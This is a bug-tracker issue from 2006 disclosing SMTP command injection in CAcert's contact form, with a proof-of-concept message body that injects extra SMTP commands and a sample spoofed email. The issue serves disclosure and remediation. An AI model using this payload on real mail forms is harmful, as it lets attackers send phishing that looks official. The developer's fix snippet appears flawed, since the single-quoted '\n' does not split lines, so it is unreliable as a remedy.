View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0000145Main CAcert Websitelogged outpublic2006-03-04 10:132013-11-20 22:23
ReporterbluecAssigned To 
PriorityurgentSeveritymajorReproducibilityalways
Status closedResolutionfixed 
Fixed in Version2006 
Summary0000145: Beware of the Evil ...
DescriptionIt is possible to send SPAM and Phishing-E-Mails using the CAcert mailserver. These emails look exactly as if sent by CAcert or CAcert-Support.

Description
===========

The cacert sendmail() function doesn't check the variables for control commands. The SMTP protocol defines a single "." as the end of a message. If you insert a "." in your message you can start a new message afterwards.

Proof of Concept
================

Use the contact form on www.cacert.org and send the following message:

------------------8<-------------------------
test
.
MAIL FROM: XXXXX
RCPT TO: XXXXX
DATA
Subject: Owned!

Sorry ...
.
------------------8<-------------------------


And you will have the following email sent to whoever you like ...

------------------------8<---------------------------
Return-Path: <XXXXX>
Delivered-To: XXXXXXXX
Received: (qmail 16437 invoked from network); 3 Mar 2006 23:53:18 +0100
Received: from hlin.cacert.org (202.87.16.201)
  by setoy.chost.de with (DHE-RSA-AES256-SHA encrypted) SMTP; 3 Mar 2006 23:53:18 +0100
Received: from hlin.cacert.org (localhost [127.0.0.1])
    by hlin.cacert.org (Postfix) with SMTP id 07B33EA76B
    for <XXXXXXXX>; Sat, 4 Mar 2006 09:53:14 +1100 (EST)
Subject: Owned!
Message-Id: <20060303225314.07B33EA76B@hlin.cacert.org>
Date: Sat, 4 Mar 2006 09:53:14 +1100 (EST)
From: XXXXXXX
To: undisclosed-recipients:;
X-Length: 668
X-UID: 12259

Sorry ...
------------------------8<---------------------------


Solution
========

All fields writen to the mailserver must be free of control commands such as "." and newlines in From: (to create other "RCPT TO:") ...


Chris
TagsNo tags attached.
Reviewed by
Test Instructions

Activities

duane

2006-03-04 10:38

developer   ~0000091

$lines = explode('\n', $message);
                foreach($lines as $line)
                {
                        $line = trim($line);
                        if($line == ".")
                                $message .= " .\n";
                        else
                                $message .= $line."\n";
                }

Issue History

Date Modified Username Field Change
2006-03-04 10:13 bluec New Issue
2006-03-04 10:38 duane Status new => closed
2006-03-04 10:38 duane Note Added: 0000091
2006-03-04 10:38 duane Resolution open => fixed
2013-01-13 16:59 Werner Dworak Fixed in Version => 2006
2013-11-20 22:23 NEOatNHNG View Status private => public